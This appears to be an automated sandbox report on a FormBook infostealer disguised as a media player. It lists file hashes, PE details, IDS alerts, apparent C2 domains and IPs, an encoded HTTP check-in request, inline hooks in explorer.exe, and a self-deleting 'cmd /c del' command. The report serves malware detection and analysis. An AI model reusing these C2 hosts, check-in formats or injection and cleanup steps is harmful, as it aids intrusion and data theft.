SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.920484439171507
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	w73FtMA4ZTl9NFm.exe
File size:	780800
MD5:	ff44bfe6955f4d11f915b4a0b818fc7c
SHA1:	3e094caff011346ad02aeafcb5769a519cf10dc0
SHA256:	929fd55e632471f4f35295e574c6814a3de9662398b7a606e352ecba9c52de7e
SHA512:	f4ee80c0bb0bae5532b880ffa704d8d99f06c0c6b3699b95be3e802347345b7cc62251ff16a0a1023303a1a72f987d39be271579652c0364485a82e7e2ab649d
SSDEEP:	12288:HTbGgj7huimS1wg0s/1wrLG1TvYmZVaIEjAYlwidyEggqEWMseF4YhY/bWGJdM5M:Hb9P06wrS1ketEjAY2C8xC4V/b/JdcM
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..`..............P......N......z.... ........@.. .......................@............@................................

File Icon


Icon Hash:	7a983a6cc2d65e0e

Static PE Info

General
Entrypoint:	0x4bb87a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x608FBD4C [Mon May 3 09:07:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb828	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x4a8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb9880	0xb9a00	False	0.939983164983	data	7.93272076919	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x4a8c	0x4c00	False	0.651521381579	data	6.39470058474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xbc190	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0xbc5f8	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4293585643, next used block 4292993507
RT_ICON	0xbd6a0	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4290757309, next used block 4291283139
RT_GROUP_ICON	0xbfc48	0x30	data
RT_VERSION	0xbfc78	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0xc0004	0xa85	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	ImporterCallback.exe
FileVersion	1.0.1.35
CompanyName	Unguest
LegalTrademarks	Unguest
Comments	A light media player
ProductName	LightWatch
ProductVersion	1.0.1.35
FileDescription	LightWatch
OriginalFilename	ImporterCallback.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/21-10:40:43.817012	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.7	64.190.62.111
05/04/21-10:40:43.817012	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.7	64.190.62.111
05/04/21-10:40:43.817012	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.7	64.190.62.111

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 10:40:00.514503002 CEST	49722	80	192.168.2.7	198.54.117.212
May 4, 2021 10:40:00.703320026 CEST	80	49722	198.54.117.212	192.168.2.7
May 4, 2021 10:40:00.703558922 CEST	49722	80	192.168.2.7	198.54.117.212
May 4, 2021 10:40:00.703862906 CEST	49722	80	192.168.2.7	198.54.117.212
May 4, 2021 10:40:00.891145945 CEST	80	49722	198.54.117.212	192.168.2.7
May 4, 2021 10:40:00.891181946 CEST	80	49722	198.54.117.212	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 10:38:27.274251938 CEST	61952	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:27.337181091 CEST	53	61952	8.8.8.8	192.168.2.7
May 4, 2021 10:38:27.571257114 CEST	56217	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:27.631792068 CEST	53	56217	8.8.8.8	192.168.2.7
May 4, 2021 10:38:27.886861086 CEST	63354	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:27.944113970 CEST	53	63354	8.8.8.8	192.168.2.7
May 4, 2021 10:38:30.188781977 CEST	53129	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:30.245868921 CEST	53	53129	8.8.8.8	192.168.2.7
May 4, 2021 10:38:30.808514118 CEST	62452	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:30.860119104 CEST	53	62452	8.8.8.8	192.168.2.7
May 4, 2021 10:38:32.994235039 CEST	57820	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:33.042834044 CEST	53	57820	8.8.8.8	192.168.2.7
May 4, 2021 10:38:33.132281065 CEST	50848	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:33.190620899 CEST	53	50848	8.8.8.8	192.168.2.7
May 4, 2021 10:38:33.974492073 CEST	61242	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:34.025893927 CEST	53	61242	8.8.8.8	192.168.2.7
May 4, 2021 10:38:34.923136950 CEST	58562	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:34.971805096 CEST	53	58562	8.8.8.8	192.168.2.7
May 4, 2021 10:38:36.600840092 CEST	56590	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:36.654328108 CEST	53	56590	8.8.8.8	192.168.2.7
May 4, 2021 10:38:37.921310902 CEST	60501	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:37.969991922 CEST	53	60501	8.8.8.8	192.168.2.7
May 4, 2021 10:38:43.196417093 CEST	53775	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:43.245058060 CEST	53	53775	8.8.8.8	192.168.2.7
May 4, 2021 10:38:44.969916105 CEST	51837	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:45.021517992 CEST	53	51837	8.8.8.8	192.168.2.7
May 4, 2021 10:38:46.549330950 CEST	55411	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:46.598040104 CEST	53	55411	8.8.8.8	192.168.2.7
May 4, 2021 10:38:48.739810944 CEST	63668	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:48.788449049 CEST	53	63668	8.8.8.8	192.168.2.7
May 4, 2021 10:38:49.571690083 CEST	54640	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:49.620564938 CEST	53	54640	8.8.8.8	192.168.2.7
May 4, 2021 10:38:49.772192955 CEST	58739	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:49.835701942 CEST	53	58739	8.8.8.8	192.168.2.7
May 4, 2021 10:38:51.379019022 CEST	60338	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:51.430614948 CEST	53	60338	8.8.8.8	192.168.2.7
May 4, 2021 10:38:52.055027962 CEST	58717	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:52.118779898 CEST	53	58717	8.8.8.8	192.168.2.7
May 4, 2021 10:38:53.719346046 CEST	59762	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:53.768022060 CEST	53	59762	8.8.8.8	192.168.2.7
May 4, 2021 10:38:54.630981922 CEST	54329	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:54.679784060 CEST	53	54329	8.8.8.8	192.168.2.7
May 4, 2021 10:38:55.575962067 CEST	58052	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:55.624779940 CEST	53	58052	8.8.8.8	192.168.2.7
May 4, 2021 10:38:56.812608004 CEST	54008	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:56.862864971 CEST	53	54008	8.8.8.8	192.168.2.7
May 4, 2021 10:38:57.858282089 CEST	59451	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:57.907332897 CEST	53	59451	8.8.8.8	192.168.2.7
May 4, 2021 10:38:58.964731932 CEST	52914	53	192.168.2.7	8.8.8.8
May 4, 2021 10:38:59.016282082 CEST	53	52914	8.8.8.8	192.168.2.7
May 4, 2021 10:38:59.960361004 CEST	64569	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:00.012146950 CEST	53	64569	8.8.8.8	192.168.2.7
May 4, 2021 10:39:01.240840912 CEST	52816	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:01.289551973 CEST	53	52816	8.8.8.8	192.168.2.7
May 4, 2021 10:39:02.224230051 CEST	50781	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:02.272746086 CEST	53	50781	8.8.8.8	192.168.2.7
May 4, 2021 10:39:03.422473907 CEST	54230	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:03.471215963 CEST	53	54230	8.8.8.8	192.168.2.7
May 4, 2021 10:39:20.582250118 CEST	54911	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:20.640160084 CEST	53	54911	8.8.8.8	192.168.2.7
May 4, 2021 10:39:21.671339989 CEST	49958	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:21.720258951 CEST	53	49958	8.8.8.8	192.168.2.7
May 4, 2021 10:39:39.998779058 CEST	50860	53	192.168.2.7	8.8.8.8
May 4, 2021 10:39:40.085185051 CEST	53	50860	8.8.8.8	192.168.2.7
May 4, 2021 10:40:00.440198898 CEST	50452	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:00.507975101 CEST	53	50452	8.8.8.8	192.168.2.7
May 4, 2021 10:40:09.431843042 CEST	59730	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:09.480675936 CEST	53	59730	8.8.8.8	192.168.2.7
May 4, 2021 10:40:18.946024895 CEST	59310	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:19.006849051 CEST	53	59310	8.8.8.8	192.168.2.7
May 4, 2021 10:40:41.468286037 CEST	51919	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:41.589045048 CEST	53	51919	8.8.8.8	192.168.2.7
May 4, 2021 10:40:42.181191921 CEST	64296	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:42.238903046 CEST	53	64296	8.8.8.8	192.168.2.7
May 4, 2021 10:40:42.759850979 CEST	56680	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:42.858141899 CEST	53	56680	8.8.8.8	192.168.2.7
May 4, 2021 10:40:43.388113022 CEST	58820	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:43.445198059 CEST	53	58820	8.8.8.8	192.168.2.7
May 4, 2021 10:40:43.695204020 CEST	60983	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:43.769695997 CEST	53	60983	8.8.8.8	192.168.2.7
May 4, 2021 10:40:43.953584909 CEST	49247	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:44.010737896 CEST	53	49247	8.8.8.8	192.168.2.7
May 4, 2021 10:40:44.489113092 CEST	52286	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:44.552871943 CEST	53	52286	8.8.8.8	192.168.2.7
May 4, 2021 10:40:44.943425894 CEST	56064	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:45.056649923 CEST	53	56064	8.8.8.8	192.168.2.7
May 4, 2021 10:40:45.637821913 CEST	63744	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:45.695066929 CEST	53	63744	8.8.8.8	192.168.2.7
May 4, 2021 10:40:46.349450111 CEST	61457	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:46.407898903 CEST	53	61457	8.8.8.8	192.168.2.7
May 4, 2021 10:40:46.989115000 CEST	58367	53	192.168.2.7	8.8.8.8
May 4, 2021 10:40:47.039330959 CEST	53	58367	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 10:38:27.571257114 CEST	192.168.2.7	8.8.8.8	0xbd4c	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
May 4, 2021 10:39:39.998779058 CEST	192.168.2.7	8.8.8.8	0x1021	Standard query (0)	www.findinkjams.com	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.440198898 CEST	192.168.2.7	8.8.8.8	0xca40	Standard query (0)	www.kompramania.com	A (IP address)	IN (0x0001)
May 4, 2021 10:40:43.695204020 CEST	192.168.2.7	8.8.8.8	0x4d9	Standard query (0)	www.sweette.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 10:38:27.631792068 CEST	8.8.8.8	192.168.2.7	0xbd4c	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 10:38:27.944113970 CEST	8.8.8.8	192.168.2.7	0x302b	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 10:39:40.085185051 CEST	8.8.8.8	192.168.2.7	0x1021	Name error (3)	www.findinkjams.com	none	none	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	www.kompramania.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
May 4, 2021 10:40:00.507975101 CEST	8.8.8.8	192.168.2.7	0xca40	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
May 4, 2021 10:40:43.769695997 CEST	8.8.8.8	192.168.2.7	0x4d9	No error (0)	www.sweette.com		64.190.62.111	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.kompramania.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49722	198.54.117.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 10:40:00.703862906 CEST	1646	OUT	GET /blm/?v4=jT8U/4hmrcCGqX5zF6RLU3xaP16cys1ENKtgh6K33uf7HOVcxmeLoGjIinA45QceqzYG68+/fQ==&Jr=V48DzvNH HTTP/1.1 Host: www.kompramania.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xED

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: w73FtMA4ZTl9NFm.exe PID: 3764 Parent PID: 5680

General

Start time:	10:38:35
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'
Imagebase:	0xfd0000
File size:	780800 bytes
MD5 hash:	FF44BFE6955F4D11F915B4A0B818FC7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: w73FtMA4ZTl9NFm.exe PID: 1168 Parent PID: 3764

General

Start time:	10:38:39
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe
Imagebase:	0xb00000
File size:	780800 bytes
MD5 hash:	FF44BFE6955F4D11F915B4A0B818FC7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3292 Parent PID: 1168

General

Start time:	10:38:41
Start date:	04/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff662bf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmstp.exe PID: 6400 Parent PID: 3292

General

Start time:	10:38:56
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmstp.exe
Imagebase:	0xa30000
File size:	82944 bytes
MD5 hash:	4833E65ED211C7F118D4A11E6FB58A09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6804 Parent PID: 6400

General

Start time:	10:39:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'
Imagebase:	0x960000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6860 Parent PID: 6804

General

Start time:	10:39:01
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: w73FtMA4ZTl9NFm.exe PID: 3764 Parent PID: 5680 w73FtMA4ZTl9NFm.exeCOMMON

Executed Functions

Function 0C1417F8, Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

BJ<z, xrefs: 0C141A44

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: BJ<z
API String ID: 0-2927076961
Opcode ID: f100aad349b43244cdb07a9be313e2acb177c91b118721a421b11fbbcefb23d6
Instruction ID: 64ad554e309bb7cfb7ba494509d2f8401c138a468b728afd798077c9d0fd60df
Opcode Fuzzy Hash: f100aad349b43244cdb07a9be313e2acb177c91b118721a421b11fbbcefb23d6
Instruction Fuzzy Hash: DCA12674E052199BCB08CFAAC5845DEFBF2FF88314F25C529D409AB315E7389981CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0C1417E8, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

BJ<z, xrefs: 0C141A44

Memory Dump Source

